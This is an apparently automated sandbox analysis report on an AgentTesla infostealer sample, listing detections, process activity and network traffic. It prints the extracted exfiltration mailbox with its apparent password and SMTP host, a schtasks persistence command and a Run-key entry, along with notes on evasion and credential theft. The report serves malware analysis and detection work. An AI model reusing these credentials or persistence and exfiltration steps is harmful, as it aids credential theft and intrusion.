Loading ...

Play interactive tourEdit tour

Analysis Report PO_000630.exe

Overview

General Information

Sample Name:PO_000630.exe
Analysis ID:412581
MD5:1fb20b0d0b5817e8485171b8271d2709
SHA1:132da2b67821a3e8168088ecb74e5a5c05df9b6c
SHA256:05c744b20df523ca0ebd41c0b9f43474fdf52754dd65b87bd5c0cf32cc2e8b88
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • PO_000630.exe (PID: 6444 cmdline: 'C:\Users\user\Desktop\PO_000630.exe' MD5: 1FB20B0D0B5817E8485171B8271D2709)
    • schtasks.exe (PID: 6660 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wDToQaa' /XML 'C:\Users\user\AppData\Local\Temp\tmp647A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6748 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • kprUEGC.exe (PID: 952 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kprUEGC.exe (PID: 6188 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "ppc@sarojprints.comCbtchn999mail.sarojprints.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO_000630.exe.40d1b40.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.PO_000630.exe.40d1b40.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.PO_000630.exe.4107d60.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "ppc@sarojprints.comCbtchn999mail.sarojprints.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\wDToQaa.exeReversingLabs: Detection: 34%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: PO_000630.exeVirustotal: Detection: 28%Perma Link
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\wDToQaa.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: PO_000630.exeJoe Sandbox ML: detected
                      Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: PO_000630.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: PO_000630.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: RegSvcs.pdb, source: kprUEGC.exe, 0000000A.00000000.410613068.0000000000642000.00000002.00020000.sdmp, kprUEGC.exe, 0000000F.00000000.427909801.00000000009D2000.00000002.00020000.sdmp, kprUEGC.exe.6.dr
                      Source: Binary string: RegSvcs.pdb source: kprUEGC.exe, kprUEGC.exe.6.dr

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49743 -> 166.62.7.52:587
                      Source: global trafficTCP traffic: 192.168.2.6:49743 -> 166.62.7.52:587
                      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                      Source: global trafficTCP traffic: 192.168.2.6:49743 -> 166.62.7.52:587
                      Source: unknownDNS traffic detected: queries for: mail.sarojprints.com
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://XACJfd.com
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://dnguSdly0lvcxMO8D.net
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://dnguSdly0lvcxMO8D.netP
                      Source: RegSvcs.exe, 00000006.00000002.602836446.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://mail.sarojprints.com
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: PO_000630.exe, 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DEBD20 SetWindowsHookExW 0000000D,00000000,?,?
                      Installs a global keyboard hookShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 6.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b5F5CA7EBu002d6429u002d47D5u002dA83Eu002d0E71610A50ABu007d/u003789B1D01u002d0D6Du002d49EBu002dBCEDu002d052A06347751.csLarge array initialization: .cctor: array initializer size 11956
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: PO_000630.exe
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_00903E47
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0132C224
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0132E670
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0132E663
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05362D28
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05363C78
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05360610
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536B688
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_053686D0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536CB35
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05366320
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05362300
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05368250
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05361A58
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05361D38
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05361D29
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05362D18
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536CD50
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536CD40
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05365CB0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536BCF0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536BCEF
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05365CC0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536C720
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536C710
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_053627A8
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536279A
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05365620
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05365612
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05360E67
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05360E90
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05365EE0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05365ED0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05366130
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05367965
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05367968
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05366140
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_053619F6
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_053619D2
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05366310
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536B378
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05363B6F
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05368BB2
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05368BC0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536BA30
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536BA20
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05368240
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05364AB8
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_05364AA8
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_053622F0
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_0536B2E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CC00F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CCC460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CC5D88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CCDE18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CC70C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CCCFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DE00EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DE32B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DE5670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DED578
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DE66C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DE78B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00DE9D38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_027847A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02784710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E36508
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E37120
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E390D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E36850
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 05E3BEC0 appears 48 times
                      Source: PO_000630.exe, 00000000.00000002.352694544.0000000003DC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs PO_000630.exe
                      Source: PO_000630.exe, 00000000.00000002.356987888.000000000BF30000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs PO_000630.exe
                      Source: PO_000630.exe, 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCQaSUetXDjACkqcCRgXsugutPgRVZS.exe4 vs PO_000630.exe
                      Source: PO_000630.exe, 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQ2prfuT.exe. vs PO_000630.exe
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSmartFormat.dll8 vs PO_000630.exe
                      Source: PO_000630.exeBinary or memory string: OriginalFilenameQ2prfuT.exe. vs PO_000630.exe
                      Source: PO_000630.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: PO_000630.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: wDToQaa.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 6.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
                      Source: C:\Users\user\Desktop\PO_000630.exeFile created: C:\Users\user\AppData\Roaming\wDToQaa.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
                      Source: C:\Users\user\Desktop\PO_000630.exeMutant created: \Sessions\1\BaseNamedObjects\aaDDKrgHoGcYyRIUNnvQ
                      Source: C:\Users\user\Desktop\PO_000630.exeFile created: C:\Users\user\AppData\Local\Temp\tmp647A.tmpJump to behavior
                      Source: PO_000630.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\PO_000630.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\PO_000630.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO_000630.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: PO_000630.exeVirustotal: Detection: 28%
                      Source: C:\Users\user\Desktop\PO_000630.exeFile read: C:\Users\user\Desktop\PO_000630.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\PO_000630.exe 'C:\Users\user\Desktop\PO_000630.exe'
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wDToQaa' /XML 'C:\Users\user\AppData\Local\Temp\tmp647A.tmp'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wDToQaa' /XML 'C:\Users\user\AppData\Local\Temp\tmp647A.tmp'
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                      Source: C:\Users\user\Desktop\PO_000630.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\PO_000630.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: PO_000630.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO_000630.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: PO_000630.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: RegSvcs.pdb, source: kprUEGC.exe, 0000000A.00000000.410613068.0000000000642000.00000002.00020000.sdmp, kprUEGC.exe, 0000000F.00000000.427909801.00000000009D2000.00000002.00020000.sdmp, kprUEGC.exe.6.dr
                      Source: Binary string: RegSvcs.pdb source: kprUEGC.exe, kprUEGC.exe.6.dr

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: PO_000630.exe, FormMathSample.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: wDToQaa.exe.0.dr, FormMathSample.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.PO_000630.exe.900000.0.unpack, FormMathSample.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.PO_000630.exe.900000.0.unpack, FormMathSample.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: PO_000630.exeStatic PE information: 0x9ECF88B1 [Sat Jun 6 23:24:33 2054 UTC]
                      Source: C:\Users\user\Desktop\PO_000630.exeCode function: 0_2_053672CE push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E3EB58 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E37AE8 push 8BF04589h; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.31245662068
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.31245662068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeJump to dropped file
                      Source: C:\Users\user\Desktop\PO_000630.exeFile created: C:\Users\user\AppData\Roaming\wDToQaa.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wDToQaa' /XML 'C:\Users\user\AppData\Local\Temp\tmp647A.tmp'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
